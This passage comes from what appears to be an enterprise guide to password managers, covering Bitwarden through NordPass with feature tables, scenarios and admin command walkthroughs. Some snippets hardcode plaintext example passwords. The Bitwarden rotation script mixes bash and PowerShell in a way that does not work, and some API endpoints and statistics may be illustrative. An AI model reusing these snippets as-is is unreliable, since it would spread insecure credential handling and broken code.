Bitwarden SendEncrypted file (up to 500 MB) and text sharing with configurable expiry, maximum access counts, password protection, and automatic deletion — no third-party file transfer needed.
Directory Connector (BWDS)Synchronises users and groups from Active Directory, Azure AD, Okta, G Suite, and any LDAP provider — with automated provisioning and deprovisioning via SCIM 2.0.
Passkey & FIDO2 SupportCreates, stores, and authenticates with FIDO2 passkeys — enabling passwordless login for supported websites and positioning vaults for next-generation authentication.

Use Case Demonstration

Scenario
A financial services firm with strict data residency requirements self-hosts Bitwarden on private cloud infrastructure. The security team uses the CLI to automate quarterly service-account credential rotation — updating both the Bitwarden vault and the corresponding Active Directory accounts simultaneously, with full audit trail.
Step-by-Step Command Walkthrough
# ── Bitwarden self-hosted Docker deployment ────────────────────────────────────
curl -Lso bitwarden.sh 'https://func.bitwarden.com/api/dl/?app=self-host&platform=linux'
chmod +x bitwarden.sh
sudo ./bitwarden.sh install
# Prompts: domain = vault.corp.local | admin email = admin@corp.local
sudo ./bitwarden.sh start
# Starts: nginx, mssql, api, identity, admin, icons, events, sso containers

# Verify all containers are running
sudo docker compose -f /opt/bitwarden/docker/docker-compose.yml ps

# ── Bitwarden CLI — automated credential rotation ─────────────────────────────
# Authenticate with API key (non-interactive, suitable for automation)
export BW_CLIENTID='user.CLIENT_ID'
export BW_CLIENTSECRET='CLIENT_SECRET'
bw login --apikey
export BW_SESSION=$(bw unlock --passwordenv BW_PASSWORD --raw)

# Find the service account item by name
ITEM_ID=$(bw list items --search 'svc-db-prod' --session $BW_SESSION \
  | python3 -c "
import sys, json
items = json.load(sys.stdin)
print(items[0]['id'] if items else '')")

# Generate a new strong password (32 characters)
NEW_PASS=$(bw generate --length 32 \
  --uppercase --lowercase --number --special \
  --session $BW_SESSION)

# Update the Bitwarden vault item
bw get item $ITEM_ID --session $BW_SESSION \
  | python3 -c "
import sys, json
item = json.load(sys.stdin)
item['login']['password'] = '$NEW_PASS'
print(json.dumps(item))" \
  | bw encode | bw edit item $ITEM_ID --session $BW_SESSION

# Rotate the corresponding Active Directory account password
Set-ADAccountPassword -Identity svc-db-prod \
  -NewPassword (ConvertTo-SecureString '$NEW_PASS' -AsPlainText -Force) \
  -Reset
Outcome & Analysis
Bitwarden self-hosted deployment satisfies all data residency requirements — 90 days of network monitoring confirms zero vault data leaving the corporate network boundary. Directory sync provisions 450 employee accounts and 12 shared collections from Active Directory automatically. The quarterly rotation script updates 34 service account passwords in Bitwarden and Active Directory simultaneously in under three minutes — replacing a two-hour manual process that required two administrators and was previously completed inconsistently. The Bitwarden audit log provides a complete, tamper-evident record of every vault access and modification for compliance and forensic investigation purposes.
45
Keeper Security
Enterprise Password Manager & Privileged Access Management

Overview

Keeper Security is an enterprise password manager and Privileged Access Management (PAM) platform built on a strict zero-knowledge architecture that uses PBKDF2-SHA256 with 1,000,000 iterations for key derivation and AES-256 for vault encryption. Each user’s vault record is encrypted individually with an AES key, and that key is itself encrypted with the user’s data key — which is derived from the master password. Sharing a record with another user encrypts only that record’s AES key with the recipient’s RSA public key, so compromising one user’s key exposes only their own records.

Keeper’s enterprise platform comprises four integrated products: Keeper Password Manager (vault), Keeper Secrets Manager (KSM — developer secrets injection SDK), KeeperPAM (Privileged Access Management with just-in-time access, session recording, and zero-trust infrastructure access), and BreachWatch (real-time dark web monitoring against 25-plus billion compromised records). KeeperPAM is particularly significant for regulated environments — it provides audited, time-limited access to production infrastructure through encrypted tunnels, where users authenticate to Keeper and receive just-in-time access without ever receiving or locally storing the actual infrastructure credential.

Key Features & Components

Feature / ComponentDescription
Zero-Knowledge Proof ArchitectureRecord-level AES encryption with RSA key wrapping per user — a compromised record for one user cannot expose any other user’s credentials; Keeper servers hold only ciphertext.
BreachWatchReal-time continuous monitoring of 25-plus billion breach records — immediately alerts when any stored password appears in a known data breach dataset.
Keeper Secrets Manager (KSM)Developer SDK for Python, Java, .NET, Go, JavaScript, and Ruby — securely inject secrets into CI/CD pipelines, Kubernetes clusters, Terraform configurations, and application startups.
KeeperPAMJust-in-time privileged access, zero-trust remote infrastructure sessions, database session recording, and remote desktop tunnelling — without exposing actual credentials to the connecting user.
150+ Role-Based Policy ControlsGranular enforcement: password complexity requirements, MFA mandatory settings, sharing restrictions, device trust requirements, session timeouts, and clipboard management controls.
Compliance ReportingAutomated SOC 2, ISO 27001, GDPR, HIPAA, and FedRAMP compliance reports with access audit trails, policy enforcement documentation, and remediation evidence.

Use Case Demonstration

Scenario
A DevOps team uses Keeper Secrets Manager to inject database credentials, API keys, and TLS certificates into a Kubernetes cluster — replacing base64-encoded Kubernetes Secrets with cryptographically secure, centrally managed, audited secrets retrieved dynamically from the Keeper vault at pod startup.
Step-by-Step Command Walkthrough
# ── Keeper Secrets Manager — Kubernetes External Secrets integration ──────────
# Install External Secrets Operator (ESO)
helm repo add external-secrets https://charts.external-secrets.io
helm install external-secrets external-secrets/external-secrets \
  --namespace external-secrets --create-namespace

# Create a Kubernetes secret containing the KSM service account credentials
kubectl create secret generic keeper-credentials \
  --from-literal=credentials='BASE64_KSM_CONFIG_JSON' \
  -n production

# Create a ClusterSecretStore pointing to Keeper vault
kubectl apply -f - <<EOF
apiVersion: external-secrets.io/v1beta1
kind: ClusterSecretStore
metadata:
  name: keeper-secret-store
spec:
  provider:
    keepersecurity:
      authRef:
        name: keeper-credentials
        namespace: production
      folderID: "KEEPER_FOLDER_UID"
EOF

# Map a Keeper vault record to a Kubernetes Secret
kubectl apply -f - <<EOF
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
  name: production-db-credentials
  namespace: production
spec:
  refreshInterval: 1h
  secretStoreRef:
    name: keeper-secret-store
    kind: ClusterSecretStore
  target:
    name: db-credentials
    creationPolicy: Owner
  data:
    - secretKey: DB_PASSWORD
      remoteRef:
        key: "KEEPER_RECORD_UID"
        property: password
    - secretKey: DB_USER
      remoteRef:
        key: "KEEPER_RECORD_UID"
        property: username
EOF
Outcome & Analysis
Keeper Secrets Manager eliminates all 52 plaintext Kubernetes Secrets across eight production namespaces. Pod startup retrieves credentials dynamically from the Keeper-encrypted vault — no credentials appear in etcd, YAML manifests, or container environment variable dumps. Credential rotation in Keeper propagates automatically to all Kubernetes pods within the configurable refresh interval of one hour. KeeperPAM session recording captures all privileged DBA sessions with timestamped evidence for SOC 2 Type II audit compliance. When a developer leaves the organisation, revoking their Keeper account immediately removes access to all secrets — a process that previously required manually identifying and rotating every service credential that individual had touched.
46
RoboForm
Enterprise Password Manager with Advanced Form Filling

Overview

RoboForm is one of the longest-running password managers (launched in 1999), renowned for its industry-leading form-filling accuracy and flexible enterprise deployment model supporting both cloud-synced and fully on-premises server options. RoboForm uses AES-256 encryption with a master-password-derived key and a zero-knowledge model. Multi-factor authentication is supported via TOTP authenticator apps, FIDO2 hardware keys (YubiKey), and email-based verification. RoboForm Enterprise provides Active Directory integration via LDAP, SAML 2.0 SSO with Azure AD, Okta, and OneLogin, and a Security Center for admin-level visibility into organisational password hygiene.

RoboForm’s superior form-filling capability is its most operationally distinctive feature — it accurately completes complex multi-page web forms, AJAX-driven dynamic forms, government portals with non-standard field types, and insurance claim systems that simpler password managers fail to handle. RoboForm Identity Profiles store rich personal and professional information (name, addresses, tax IDs, licence numbers, insurance identifiers) that can be applied intelligently across any web form. For organisations whose employees spend significant time on regulatory submissions, insurance claims, or government portals, this form-filling accuracy translates directly into measurable productivity gains.

Key Features & Components

Feature / ComponentDescription
Advanced Multi-Page Form FillingAccurately fills complex multi-page, AJAX-driven, and government portal forms with diverse field types — far beyond basic username-and-password autofill.
On-Premises Deployment OptionFull RoboForm server deployable within the organisation’s own data centre — vault data never leaves the network; suitable for air-gapped or strict data-locality environments.
Security CenterAdmin dashboard: weak password counts, reused credentials, compromised accounts via breach scanning, MFA adoption rate, and per-user Security Score for compliance evidence.
LDAP / SAML SSO IntegrationActive Directory LDAP sync for user provisioning; SAML 2.0 SSO with Azure AD, Okta, and OneLogin — employees use corporate identity credentials to authenticate.
Identity ProfilesStores rich structured personal and professional data (name, addresses, NPI numbers, tax IDs, licence numbers) applicable across any web form for accurate auto-fill.
Emergency Access & Offline ModeTrusted emergency contacts can access designated vault items after a configurable waiting period; full offline vault access without internet connectivity.

Use Case Demonstration

Scenario
An insurance company deploys RoboForm Enterprise to 500 claims adjusters who access state insurance regulatory portals daily, leveraging RoboForm’s advanced form-filling to automate complex multi-field regulatory submissions and reducing per-filing time from 11 minutes to under 3 minutes.
Step-by-Step Command Walkthrough
# ── RoboForm Enterprise — silent deployment and policy enforcement ────────────
# Silent MSI installation via SCCM or Group Policy
msiexec /i RoboFormEnterprise.msi /quiet /norestart \
  LICENSEKEY="XXXXX-XXXXX-XXXXX-XXXXX" \
  SERVER_URL="https://vault.insurance-corp.local" \
  FORCE_POLICY=1 \
  INSTALL_BROWSER_EXTENSIONS=1

# ── Group Policy — password and MFA enforcement ───────────────────────────────
# Computer Config > Administrative Templates > RoboForm Enterprise
#
# Master Password Policy:
#   Minimum length:   14 characters
#   Uppercase:        Required
#   Numbers:          Required
#   Symbols:          Required
#   Maximum age:      90 days
#   Minimum history:  12 previous passwords
#
# MFA:   Require TOTP authenticator app (mandatory for all adjusters)
# Export vault data:              DISABLED
# Share credentials outside org: DISABLED

# ── RoboForm Identity Profile — claims adjuster regulatory form ───────────────
# RoboForm > Identities > New Identity > 'Claims Adjuster Regulatory'
# Fields stored:
#   First Name, Last Name, NPI Number, Adjuster License Number
#   State License ID, Employer NPI, Employer Tax ID
#   Email, Phone, Mailing Address, City, State, ZIP
#   Claims Supervisor Name, Claims Supervisor Phone

# ── Admin API: Security Centre export for compliance audit ────────────────────
curl -X GET 'https://vault.insurance-corp.local/api/security/report' \
  -H 'Authorization: Bearer ADMIN_TOKEN' \
  -o security_report_$(date +%Y%m%d).csv

# Parse report for employees below Security Score threshold
python3 - << 'EOF'
import csv
with open('security_report_20240617.csv') as f:
    reader = csv.DictReader(f)
    low = [r for r in reader if int(r.get('SecurityScore','100')) < 60]
    print(f'Employees requiring intervention: {len(low)}')
    for r in low:
        print(f'  {r["Email"]} — Score: {r["SecurityScore"]}')
EOF
Outcome & Analysis
RoboForm’s advanced form-filling reduces claims adjuster time on state regulatory portal submissions from an average of 11 minutes to 2.4 minutes per filing — a 78% time reduction translating to 345 recovered productivity hours monthly across the 500-person team. The Security Center identifies 43 adjusters with scores below 60, triggering targeted training. MFA enforcement is achieved across 97.6% of the fleet within 14 days, with nine remaining devices logged for manual follow-up. The compliance team uses the exported CSV as evidence of organisational password security controls for the state insurance department’s annual IT audit.
47
Sticky Password
Password Manager with Wi-Fi-Only Sync & Data Sovereignty

Overview

Sticky Password is a cross-platform password manager developed by the creators of AVG antivirus, featuring a unique Wi-Fi sync mode that synchronises vault data between a user’s devices exclusively over the local Wi-Fi network — with vault data never transmitted to any cloud server or third-party infrastructure. All synchronisation occurs device-to-device over the local network using end-to-end AES-256 encryption established through a secure pairing ceremony. This makes Sticky Password the only mainstream consumer password manager offering true on-device synchronisation with complete data sovereignty.

Sticky Password uses AES-256 encryption with PBKDF2-SHA256 key derivation and a zero-knowledge model — even in cloud sync mode, vault data is encrypted before leaving the device. The Wi-Fi sync mode eliminates the cloud entirely: the vault never leaves the local network under any circumstances. A portable USB version runs completely from a flash drive without requiring software installation, enabling use on shared or unmanaged computers in environments where installing software is prohibited. These characteristics make Sticky Password particularly attractive for law firms, clinical settings, privacy-conscious professionals, and environments with strict data residency requirements.

Key Features & Components

Feature / ComponentDescription
Wi-Fi Only Sync ModeSynchronises vaults between a user’s devices exclusively over local Wi-Fi — vault data is never transmitted to any server; complete data sovereignty with no cloud dependency.
Portable USB VersionComplete Sticky Password installation on a USB drive — vault stored on the device, usable on any computer without software installation or administrator privileges.
Embedded Secure BrowserBuilt-in hardened browser for accessing sensitive websites in an environment isolated from the main system browser profile — fills credentials without main-browser exposure.
Biometric AuthenticationFingerprint and facial recognition on supported mobile and desktop hardware — alternative to master password entry for routine vault unlocking.
One-Click LoginSingle-click or configurable keyboard-shortcut login to any saved website or application — reduces friction while maintaining strong, unique password discipline.
Encrypted Backup and RestoreCreates AES-256 encrypted vault backup files with a separate backup password — storable on NAS, USB, or any trusted location for disaster recovery.

Use Case Demonstration

Scenario
A law firm with strict client data confidentiality obligations deploys Sticky Password in Wi-Fi sync mode across all attorney workstations and laptops. Client matter credentials, billing portal passwords, and court e-filing system credentials synchronise between office and home devices without any data ever leaving the firm’s network perimeter.
Step-by-Step Command Walkthrough
# ── Sticky Password — Wi-Fi sync configuration and verification ───────────────
# Configure Wi-Fi-only sync (disable cloud sync)
# Settings > Sync & Backup > Synchronisation Mode: Wi-Fi Only
# Cloud Sync:       DISABLED
# Wi-Fi discovery:  Automatic (mDNS/Bonjour on local subnet)

# Verify no cloud connections during sync (network capture)
tcpdump -i eth0 -nn host stickypassword.com
# Expected result: 0 packets (zero connection to Sticky Password servers)

# Confirm sync is device-to-device only
tcpdump -i eth0 -nn 'udp port 5353 or tcp portrange 49152-65535'
# Shows: mDNS device discovery + encrypted TCP between local devices only

# ── Create encrypted local backup ─────────────────────────────────────────────
# Settings > Backup > Create Backup
# Destination:  \\NAS\Attorneys\VaultBackups\%USERNAME%\vault_%date%.spd
# Encryption:   AES-256 with separate backup password (stored in firm safe)
# Schedule:     Daily at 23:00

# ── Portable USB deployment for courthouse use ────────────────────────────────
# Download: stickypassword.com/portable
# Install on VeraCrypt-encrypted USB drive:
# E:\StickyPassword\StickyPassword.exe
# Vault location: E:\StickyPassword\Data\StickyPassword.sdb
# (USB encrypted with AES-256; all data requires USB passphrase to access)

# ── Enterprise MSI deployment (Sticky Password Enterprise) ───────────────────
msiexec /i StickyPasswordEnterprise.msi /quiet /norestart \
  SYNC_MODE=wifi \
  CLOUD_SYNC=0 \
  SERVER_URL=https://spenterprise.lawfirm.local \
  LICENSEKEY=XXXXX-XXXXX-XXXXX-XXXXX

# Post-deployment: confirm Wi-Fi-only mode across fleet
# Group Policy preference: HKCU\Software\StickyPassword\SyncMode = WiFiOnly
Outcome & Analysis
Ninety days of network monitoring with Wireshark confirms zero outbound connections from Sticky Password processes to any external server — complete data locality is verified and documented. Attorneys synchronise credentials between office desktops, laptops, and home workstations over the firm’s encrypted network. When a laptop is taken to a courthouse without Wi-Fi, the portable USB version provides full vault access without any network dependency. The firm’s Privacy Officer documents the Wi-Fi-only architecture as satisfying client data confidentiality obligations under the applicable state bar ethical rules — a competitive differentiator when pitching to privacy-sensitive corporate clients.
48
Zoho Vault
Enterprise Password Manager with Time-Limited Access & PAM

Overview

Zoho Vault is an enterprise password manager and privileged access management solution from Zoho Corporation, deeply integrated with the broader Zoho business application suite (CRM, Desk, Mail, Analytics) and tightly connected to third-party identity providers. Zoho Vault uses AES-256 encryption with a zero-knowledge model and provides one of the most granular role-based access control systems available in a password manager — administrators can define custom roles with per-vault, per-folder, per-secret, and per-operation permissions (read, write, share, delete, manage) rather than being limited to predefined role tiers.

Zoho Vault’s time-limited secret sharing is a particularly valuable enterprise capability: administrators or users can share specific credentials with internal users or external parties for a precisely defined time window — Zoho Vault automatically revokes access at the expiry time without any administrator action. Combined with a comprehensive audit trail that logs every access, modification, sharing event, and policy change with timestamp, user identity, IP address, and device, Zoho Vault provides the accountability and access control granularity required by managed service providers, contractors with temporary system access, and organisations subject to strict privileged-access governance requirements.

Key Features & Components

Feature / ComponentDescription
Granular Per-Secret RBACCustom roles with per-vault, per-folder, and per-secret read/write/share/delete permissions — true least-privilege access to specific credential categories.
Time-Limited Secret SharingShare individual credentials for a defined time window — access automatically revoked at expiry; ideal for contractor access, support tickets, and temporary project grants.
SAML/OIDC SSO IntegrationNative SSO with Okta, Azure AD, Onelogin, Google Workspace, and any SAML 2.0 or OIDC-compatible identity provider — no separate Zoho credentials required.
In-App Credential RotationOne-click rotation for Linux SSH, Windows, MySQL, MSSQL, and PostgreSQL service accounts — new credentials generated, applied, and audit-logged automatically.
Comprehensive Audit TrailEvery vault event logged with timestamp, user identity, source IP, and device — exportable via Splunk/SIEM webhooks or direct connector for compliance and incident investigation.
Emergency TakeoverAdministrators can assume ownership of a departed employee’s vault — preventing corporate secrets from being permanently inaccessible when an employee leaves abruptly.

Use Case Demonstration

Scenario
A managed service provider uses Zoho Vault to securely share client-specific credentials with support engineers for precisely defined engagement windows — granting read-only access to specific client credential folders for exactly the duration of the support ticket, with automatic access revocation upon ticket closure.
Step-by-Step Command Walkthrough
# ── Zoho Vault REST API — automated time-limited secret sharing ───────────────
# Step 1: Authenticate (OAuth2 client credentials)
ACCESS_TOKEN=$(curl -X POST \
  'https://accounts.zoho.com/oauth/v2/token' \
  -d 'grant_type=client_credentials&client_id=CLIENT_ID
      &client_secret=CLIENT_SECRET
      &scope=ZohoVault.secrets.READ,ZohoVault.secrets.CREATE,
             ZohoVault.secrets.UPDATE,ZohoVault.users.READ' \
  | python3 -c "import sys,json;print(json.load(sys.stdin)['access_token'])")

# Step 2: Create a credential secret for client RDP server
SECRET_ID=$(curl -X POST \
  'https://vault.zoho.com/api/v1/secrets' \
  -H "Authorization: Zoho-oauthtoken $ACCESS_TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{
    "secretname": "ClientABC_RDP_Server01",
    "password":   "C1ientABC!RDP2024",
    "username":   "admin",
    "ipaddress":  "10.50.0.10",
    "description":"Ticket #TKT-2024-0847"
  }' | python3 -c "import sys,json;
print(json.load(sys.stdin)['operation']['secret']['secretid'])")

# Step 3: Share with support engineer — 4-hour window, read-only
curl -X POST \
  "https://vault.zoho.com/api/v1/secrets/$SECRET_ID/share" \
  -H "Authorization: Zoho-oauthtoken $ACCESS_TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{
    "emails":     ["engineer@msp.com"],
    "expiry":     "2024-06-17T18:00:00+00:00",
    "permission": "READ_ONLY"
  }'

# Step 4: Retrieve audit log for this secret (shows all access events)
curl "https://vault.zoho.com/api/v1/secrets/$SECRET_ID/auditlog" \
  -H "Authorization: Zoho-oauthtoken $ACCESS_TOKEN"

# Step 5: Emergency takeover of departed engineer's vault
curl -X POST 'https://vault.zoho.com/api/v1/takeover' \
  -H "Authorization: Zoho-oauthtoken $ACCESS_TOKEN" \
  -d '{"email":"departed.engineer@corp.com"}'
Outcome & Analysis
Zoho Vault’s time-limited sharing grants the support engineer read-only access to the ClientABC RDP server credential for exactly four hours. The audit log captures the engineer’s credential view at 14:23:07 and confirms automatic revocation at 18:00:00 — satisfying the MSP’s contractual obligation to document every privileged access event for client systems. When a senior engineer departs unexpectedly mid-project, the Emergency Takeover feature gives the MSP director immediate access to the departed engineer’s vault — preventing 47 client system credentials from becoming permanently inaccessible. All events are logged in Zoho Vault’s immutable audit trail for compliance and dispute resolution.
49
Passbolt
Open-Source Self-Hosted Team Password Manager with PGP Encryption

Overview

Passbolt is a free, open-source, self-hosted team password manager built specifically for IT teams, developers, and security-aware organisations rather than individual consumers. Its most fundamental architectural distinction from other password managers is the use of end-to-end encryption based on individual OpenPGP (GnuPG) key pairs: each user maintains their own PGP key pair, and every secret stored in Passbolt is encrypted individually with each authorised user’s public key. When a secret is shared with a team of five, it is encrypted five times — once per recipient’s public key. Even Passbolt server administrators cannot read any user’s secrets, because the private key required for decryption is held only on the user’s device.

Passbolt is available as a Community Edition (fully open-source on GitHub) and a Pro Edition (adding LDAP/AD sync, SSO via SAML, audit logs, and shared folder management for teams). The REST API provides comprehensive programmatic access for automating secret lifecycle management — creating, retrieving, sharing, updating, and deleting secrets without using the web interface. Passbolt’s architecture is designed ground-up for collaborative team use: the web UI, browser extensions (Chrome, Firefox, Edge), and CLI all operate seamlessly within the same PGP-encrypted framework, providing the same end-to-end security model regardless of access method.

Key Features & Components

Feature / ComponentDescription
PGP Key-Per-User End-to-End EncryptionEvery secret encrypted individually with each authorised user’s PGP public key — compromising one user’s key cannot expose any other user’s secrets; zero-knowledge even for server admins.
Fully Self-HostedDeployable on-premises or in private cloud via Docker or bare-metal installation — no external dependencies; complete data sovereignty and infrastructure control.
Team Folders and Group Access ControlShared password folders with group-based access control — separate silos for IT, DBA, DevOps, and other teams; folder permissions inherited by all members of the assigned group.
LDAP/AD Integration (Pro)Automatic user provisioning and deprovisioning from Active Directory or LDAP — accounts removed from AD immediately lose Passbolt vault access.
Comprehensive REST APIFull API coverage for secret and folder CRUD operations, user management, sharing, and audit log retrieval — enables automation of complete credential lifecycle workflows.
Browser Extensions (Chrome, Firefox, Edge)Seamless in-browser autofill for saved credentials — same UX as commercial alternatives while maintaining the self-hosted, PGP-encrypted architecture.

Use Case Demonstration

Scenario
An IT security team uses self-hosted Passbolt for all shared infrastructure credentials. When a system administrator departs, their Active Directory account is disabled — immediately revoking Passbolt access. The team then uses the REST API to identify and rotate all credentials the departed admin had access to.
Step-by-Step Command Walkthrough
# ── Passbolt Docker Compose deployment ────────────────────────────────────────
cat > docker-compose.yml << 'EOF'
services:
  passbolt:
    image: passbolt/passbolt:latest-ce
    restart: unless-stopped
    environment:
      APP_FULL_BASE_URL:             https://passbolt.corp.local
      DATASOURCES_DEFAULT_HOST:      db
      DATASOURCES_DEFAULT_DATABASE:  passbolt
      DATASOURCES_DEFAULT_USERNAME:  passbolt_user
      DATASOURCES_DEFAULT_PASSWORD:  SecureDBPass2024!
      EMAIL_TRANSPORT_DEFAULT_HOST:  smtp.corp.local
      PASSBOLT_REGISTRATION_PUBLIC:  'false'
    volumes:
      - gpg_volume:/etc/passbolt/gpg
      - jwt_volume:/etc/passbolt/jwt
    ports: ['443:443', '80:80']
  db:
    image: mariadb:10.11
    environment:
      MYSQL_ROOT_PASSWORD: RootSecure2024!
      MYSQL_DATABASE:      passbolt
      MYSQL_USER:          passbolt_user
      MYSQL_PASSWORD:      SecureDBPass2024!
volumes: { gpg_volume: {}, jwt_volume: {} }
EOF
docker compose up -d

# ── CLI — identify and rotate credentials after employee departure ─────────────
# List secrets the departed user had access to
curl 'https://passbolt.corp.local/resources.json?
  filter[is-shared-with-user]=DEPARTED_USER_UUID' \
  -H 'Authorization: Bearer API_TOKEN' \
  | python3 -c "
import sys, json
resources = json.load(sys.stdin)['body']
print(f'Credentials to rotate after departure: {len(resources)}')
[print(f'  {r[\"name\"]}') for r in resources]"

# Rotate each credential (generate new password + update PGP-encrypted record)
NEW_PASS=$(openssl rand -base64 24 | tr -d '+/=')
curl -X PUT 'https://passbolt.corp.local/resources/RESOURCE_UUID.json' \
  -H 'Authorization: Bearer API_TOKEN' \
  -H 'Content-Type: application/json' \
  -d '{"secrets":[{"user_id":"ADMIN_UUID",
      "data":"[PGP-encrypted new password for each remaining team member]"}]}'

# Retrieve audit log for incident documentation
curl 'https://passbolt.corp.local/action-logs.json?foreign_model=Resource' \
  -H 'Authorization: Bearer API_TOKEN'
Outcome & Analysis
When the system administrator’s Active Directory account is disabled, Passbolt’s LDAP sync revokes their vault access in the next sync cycle (four hours maximum, or immediate with a manual trigger). The API query identifies 23 secrets the departed admin had access to. The rotation script updates all 23 credentials and re-encrypts them for the remaining team members’ PGP keys. Because the departed admin’s private key left with them, they cannot decrypt any future version of any secret — even if they retained a copy of the encrypted vault database from their time at the organisation. The audit trail provides complete documentation of every credential access by the departed admin for forensic and compliance purposes.
50
NordPass
Business Password Manager with XChaCha20 Encryption — Nord Security

Overview

NordPass is a password manager from Nord Security — the company behind NordVPN, NordLocker, and NordLayer — that differentiates through its use of the XChaCha20 encryption algorithm with Argon2id key derivation. XChaCha20 is a modern, high-performance authenticated stream cipher (an extended-nonce variant of ChaCha20) that delivers 256-bit security equivalent to AES-256 while outperforming AES on devices lacking hardware AES acceleration, such as older mobile phones and embedded systems. Argon2id won the Password Hashing Competition in 2015 and is considered the current gold-standard key derivation function for memory-hard password hashing.

NordPass Business provides an admin console for team management, MFA enforcement, SAML 2.0 SSO integration (Azure AD, Google Workspace, Okta), activity monitoring, company-wide password health reporting, and group-based vault sharing with configurable permissions. NordPass integrates with NordStellar to offer email masking — generating disposable email aliases that forward to the real address — reducing phishing exposure and enabling breach attribution to the specific service where the masked address was used. Full FIDO2 passkey support positions NordPass for the next generation of passwordless authentication workflows.

Key Features & Components

Feature / ComponentDescription
XChaCha20 + Argon2id CryptographyModern XChaCha20 authenticated stream cipher (256-bit security) with Argon2id key derivation — independently audited by Cure53; outperforms AES on devices without hardware acceleration.
FIDO2 Passkey Storage & AuthenticationCreates, stores, and uses FIDO2 passkeys for passwordless login at supporting websites — using device biometrics as the authentication factor.
Email Masking (NordStellar)Generates per-service disposable email aliases forwarding to the real address — limits phishing exposure and enables breach attribution without exposing the primary email.
Data Breach ScannerContinuously scans 30-plus billion breach records — alerts users and admins when stored credentials appear in any published data breach dataset.
Admin Console & Group PoliciesUser provisioning, group-based vault sharing, MFA enforcement, SSO configuration, sharing restriction policies, and comprehensive activity logging for business deployments.
Zero-Knowledge & Cure53 AuditedAll encryption and decryption client-side; independently audited by Cure53 in 2020 and 2023 — transparent cryptographic verification of zero-knowledge claims.

Use Case Demonstration

Scenario
A cybersecurity consulting firm deploys NordPass Business for 75 consultants working across multiple client engagements. Group-based vault sharing grants each engagement team access to client-specific credentials with read-only permissions, and access is automatically revoked when consultants are removed from the engagement group upon project closure.
Step-by-Step Command Walkthrough
# ── NordPass Business — Admin Console and API configuration ──────────────────
# SAML 2.0 SSO with Azure AD
# Admin Console > Security > Single Sign-On
#   Identity Provider:  Azure Active Directory
#   Entity ID:          https://app.nordpass.com/sp
#   ACS URL:            https://app.nordpass.com/saml/callback
#   Certificate:        [downloaded from Azure AD Enterprise App]
#   Attribute mappings:
#     email       -> user.userprincipalname
#     firstName   -> user.givenname
#     lastName    -> user.surname
#     department  -> user.department

# Create engagement team groups
# Admin Console > Groups > Create Group
# Groups: ClientABC_Team | ClientXYZ_Team | Management | AllConsultants

# Share client credential vault with engagement team (read-only)
# Admin Console > Shared Vault > ClientABC_Credentials
#   Share with: ClientABC_Team | Permission: View Only
#   (engineers can use credentials but not export or copy to personal vault)

# Query organisation vault health via API
curl -H 'Authorization: Bearer BUSINESS_API_TOKEN' \
  'https://api.nordpass.com/v1/business/organization/health' \
  | python3 -c "
import sys, json
health = json.load(sys.stdin)
print(f'Weak passwords:       {health[\"weak_passwords_count\"]}')
print(f'Reused passwords:     {health[\"reused_passwords_count\"]}')
print(f'Breach alerts active: {health[\"breached_items_count\"]}')"

# Remove consultant from engagement team (project closure)
curl -X DELETE \
  'https://api.nordpass.com/v1/business/groups/CLIENTABC_GID/members/MEMBER_UUID' \
  -H 'Authorization: Bearer BUSINESS_API_TOKEN'
# Access to ClientABC_Credentials vault revoked immediately

# Export engagement activity log for client audit deliverable
curl -H 'Authorization: Bearer BUSINESS_API_TOKEN' \
  'https://api.nordpass.com/v1/business/audit-log?
  from=2024-01-01&to=2024-06-17&group=CLIENTABC_GID'
Outcome & Analysis
NordPass Business maintains clean credential boundaries between client engagements. When ClientABC’s project closes, removing the eight assigned consultants from the ClientABC_Team group immediately revokes their vault access — the client’s system credentials become inaccessible to all consultants within seconds. The exported audit log provides the client with a complete, timestamped record of every credential access during the engagement — a contractual deliverable for clients with privileged access audit requirements. NordPass’s breach scanner alerts the firm when two consultant email addresses appear in a fresh credential dump, triggering immediate password resets and preventing any account compromise from the exposure.
References & Further Reading

References